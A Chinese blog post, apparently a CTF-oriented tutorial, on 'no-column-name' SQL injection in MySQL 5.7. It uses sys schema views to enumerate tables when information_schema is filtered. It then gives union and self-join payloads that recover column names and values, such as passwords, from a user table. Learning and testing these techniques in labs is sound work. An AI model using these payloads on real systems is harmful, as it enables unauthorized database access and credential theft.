安科网

无列名注入

zhaojp0

zhaojp0

2020-05-06

关注 关注

写在前边

又是没有梦想的一天。。。这里介绍一下无列名注入,要求mysql >= 5.7

CTF题 https://www.cnblogs.com/Lee-404/p/12830910.html

information_schema

在 mysql => 5 的版本中存在库information_schema,记录着mysql中所有表的结构,通常,在mysql sqli中,我们会通过此库中的表去获取其他表的结构,即表名,列名等。但是这个库也会经常被WAF过滤。

sys

  在mysql5.7增加了sys 系统数据库,通过这个库可以快速的了解系统的元数据信息这个库确实可以方便DBA发现数据库的很多信息,解决性能瓶颈都提供了巨大帮助,简单来说,当数据库版本是5.7,information_schema库被过滤时,可以利用sys这个库来读取数据

测试

新建一个库,里边有两张表

无列名注入

我们都知道,一般注入我们都是在infromation_schema这个库里获取我们需要的

  猜数据库   

select schema_name from information_schema.schemata

 无列名注入

 猜某库的数据表

select table_name from information_schema.tables where table_schema=‘数据库名‘

无列名注入

猜某表的所有列

Select column_name from information_schema.columns where table_name=‘数据表名‘

  无列名注入

   获取某列的内容

Select  字段名 from 数据表

   这是我们一般的注入流程,但当information_schema被过滤,mysql又是5.7时,我们可以利用sys库来获取信息

先了解一下比较重要的视图

sys.schema_auto_increment_columns

  在设计表中,一般会给一些字段添加自增,如果是,那么这个视图下保存的就是那些有自增字段表的数据库的信息
无列名注入

security是sqli-libs的数据库,test库中的test表是我自己建的,其中id字段为自增,可以在不使用information_schema的情况下读取信息

select table_schema from sys.schema_auto_increment_columns;  //查数据库

无列名注入

select table_name from sys.schema_auto_increment_columns where table_schema = ‘test‘;  //查表

无列名注入

 和infromation_schema一样的效果

schema_table_statistics_with_buffer,x$schema_table_statistics_with_buffer

  当表不存在自增字段时可以利用这两个视图查询,在user表中我没设自增字段

无列名注入

无列名注入

当然还有其他的视图可以,具体利用方法和上述差不多

绕过information_schema无列名注入

  经过上述的,似乎只能得到表名,没有完整的字段名,也就是说,我们无法获取字段值,这时候就可以利用无列名注入,我这里直接本地测试了(环境懒得搭,假装过滤了)

  1.获取字段数,用order by 或 group by

无列名注入

  2.union联合查询

select * from user where id = -1 union all select 1,2,3,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database();

无列名注入

     3.利用join获取列名(join在CTF中经常使用的思路)

select * from user where id = -1 union all select * from (select * from user as a join user as b)as c;

无列名注入    4.获取更多字段名和字段值

select * from user where id = -1 union all select*from (select * from user as a join user b using(id,username,passwd,phone))c;

无列名注入

参考链接

https://www.anquanke.com/post/id/193512 

如有错误和不足请评论联系指出,谢谢

https 数据库

zhaojp0

zhaojp0

0 关注 1 粉丝 0 动态

关注 关注

相关推荐

详解Navicat Premium基本使用

Navicat是一套数据库管理工具,专为简化数据库的管理及降低系统管理成本而设。Navicat 是以直觉化的图形用户界面而建的,可以安全和简单地创建、组织、访问并共用信息。Navicat Premium 是 Navicat 的产品成员之一,能简单并快速地在

amienshxq 2020-11-14

使用 Navicat 创建数据库并用JDBC连接的操作方法

昨天学习 Java 的数据库部分,就试着写了一下 JDBC 连接的代码,并尝试与数据库进行连接。中间也是遇到了一些问题,解决之后,在这里分享一下,也算做个记录。这个就不多说了,需要的自己百度教程;输入连接名称,用户名、密码,然后 OK 就可以创建新的连接了

ASoc 2020-11-14

一款免费开源的通用数据库工具DBeaver

在制作《SQL 入门教程》时,接触到了这款非常强大易用的数据库管理和开发工具:DBeaver,也就是上面这个可爱的小河狸。DBeaver 是一个基于 Java 开发,免费开源的通用数据库管理和开发工具,使用非常友好的 ASL 协议。可以通过官方网站或者 G

yungpheng 2020-10-19

datagrip如何找到数据库和表

用习惯了navicat,一直喜欢如下界面,可以方便查看数据库及表的信息。但是不知道为什么navicat总是无法连接oracle,因此转战datagrip。第一次使用datagrip,用户体验可谓是相当差了(大佬莫喷,对于我的使用习惯来说,这款软件用户体验真

尘封飞扬 2020-09-29

Pycharm连接MongoDB数据库安装教程详解

最新版本的Pycharm搜不到Plugin插件,自己手动下载Mongo Plugin插件下载地址。我把它放在了MongoDB的安装路径下。下一节开始试用。

BigYellow 2020-11-16

如何在Fedora上安装Google Chrome浏览器

Fedora 的默认网页浏览器是 Firefox。尽管它是一个优秀的网络浏览器,你可能更喜欢流行的 Google Chrome 浏览器。如果你想知道如何在 Fedora 上安装 Google Chrome 浏览器,让我告诉你两种安装 Google Chro

86417413 2020-11-25

如何在Fedora中安装VirtualBox

如果你对 Fedora Linux 感兴趣,这有几种方式可以尝试它。最简单还不影响你操作系统的方式是制作 Fedora 的 USB 临场启动盘。在 Linux 发行版的使用方式上,有一种可以无需安装而通过光盘或 USB 存储棒直接在计算机上启动完整的 Li

星愿心愿 2020-11-24

自动解锁Linux上的加密磁盘

通过使用网络绑定磁盘加密,无需手动输入密码即可打开加密磁盘。从安全的角度来看,对敏感数据进行加密以保护其免受窥探和黑客的攻击是很重要的。要使用 LUKS 配置加密磁盘或分区,你需要使用cryptsetup工具。然而,网络绑定磁盘加密Network-Boun

bluecarrot 2020-11-23

Win10累积更新下载 紧急修复Kerberos认证系统漏洞

Win10补丁KB4579311导致开机黑屏怎么办?Win10怎么下载KB4579311升级至19042.572预览版?

82216135 2020-11-19

win10个性化软件窗口显示不全怎么办

win10个性化软件窗口显示不全怎么办

HelloJohn 2020-11-19

win10提示错误代码0x800700E1怎么办? 0x800700E1错误的解决办法

我们在win10系统处理文件会出现WIN10错误代码0x800700E1,但是很多人不清楚WIN10错误代码0x800700E1怎么解决?下面我们就来看看0x800700E1错误代码的正确处理方法,详细请看下文介绍。Win10 20H2预览版19042.6

85276131 2020-11-18

Win10提示系统管理员设置了系统策略该如何解决

操作方法很简单,下面我们一起来看看Win10安装软件提示“系统管理员设置了系统策略,禁止进行此安装”的解决办法。

82256036 2020-11-18

Win10桌面图标加载缓慢怎么办? 桌面加载不出来的解决办法

下面我们就来看看win桌面图标加载缓慢的解决办法。选中选项"显示隐藏的文件、文件夹和驱动器"。重新启动电脑以让更改生效。Win10桌面图标怎么去掉小盾牌?Win10开机桌面图标显示卡顿该怎么办?

梁柏林 2020-11-16

Win10开发人员模式在哪? Win10开启开发人员模式的技巧

开发人员模式对于一部分用户来说也是非常重要的一个模式,那么要怎么开启这个模式呢?下面我们就来看看开发者模式的使用方法。win10系统怎么设置按F8进入安全模式?win10夜灯模式在哪?win10打开夜灯模式的两种方法

80266038 2020-11-15

Chrome 87新特性解读,多年来Chrome性能最大提升!

近日Chrome更新了 87 最新版,这是今年最后一次 Chrome 更新了,这个版本是多年来 Chrome 性能获得最大提升的一次,开发者工具也进行了大幅度更新。有用户认为,原本 Chrome 的性能问题诟病已久,然而在新 Edge 出来了以后,性能突然

simonzhao0 2020-11-23

jQuery UI组件库使用技巧小分享,让移动、Web界面开发更简单!

Kendo UI目前最新提供Kendo UI for jQuery、Kendo UI for Angular、Kendo UI Support for React和Kendo UI Support for Vue四个控件。Kendo UI for jQue

EdwardSiCong 2020-11-23

Golang中Delve版本太低无法Debug的问题

打开 Hele->Edit Customer Properties,若提示文件不存在,点击创建。

窗前废雨 2020-11-16

关于go语言编码需要放到src 文件夹下的问题

配置GOPATH的用意是为了方便项目的部署和构建,以及可以直接使用go get 命令下载第三方的包到自己的项目的src下和相关的执行文件bin目录,和中间文件pkg. 问1:index entire GOPATH:如果你选中那么我就把你在环境变量中配置的G

wfs 2020-10-29

Docker 文档编译 - 创建标签(Tab)页

标签页使用的是 Bootstrap CSS/JS,因此请参考相关的文档来获得有关标签页使用的更多有关内容和信息。针对标准的水平标签页,你可以拷贝和粘贴下面的表单内容,在上面的表单内容中关键的地方在href="#id"和id="

bwyyziq 2020-11-22

阿里云centos7安装mysql8.0.22的详细教程

设置开机启动Mysql[root@localhost ~]# systemctl enable mysqld.service. mysql> alter user 'root'@'localhost' identified by '新密码';这里建议

CosEmon 2020-11-13
zhaojp0

zhaojp0

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号